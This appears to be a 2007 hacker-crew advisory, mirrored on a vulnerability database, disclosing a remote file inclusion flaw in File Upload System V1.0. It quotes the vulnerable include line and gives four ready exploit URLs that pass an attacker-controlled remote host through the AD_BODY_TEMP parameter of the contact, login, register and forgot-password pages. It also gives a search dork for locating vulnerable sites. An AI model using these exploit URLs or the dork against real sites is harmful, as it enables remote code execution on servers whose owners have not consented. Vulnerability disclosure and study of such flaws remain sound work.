Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16454
HistoryMar 25, 2007 - 12:00 a.m.

File Upload System V1.0 (AD_BODY_TEMP) multiple file include

2007-03-2500:00:00
vulners.com
21

============================ HItamputih Crew ====================

hitamputih Advisory

Discovered By : IbnuSina & jipank

#-----------------------------------------------------------

Software: File Upload System V1.0

Script Demo: http://demo.free-php-scripts.net/File_Upload

Method: file inclusion

Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew

[[Exploitz]]---------------------------------------------------------

?php include($AD_BODY_TEMP);?>

exploit :

http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu

gugel dork : intext:"Marsal Design Co."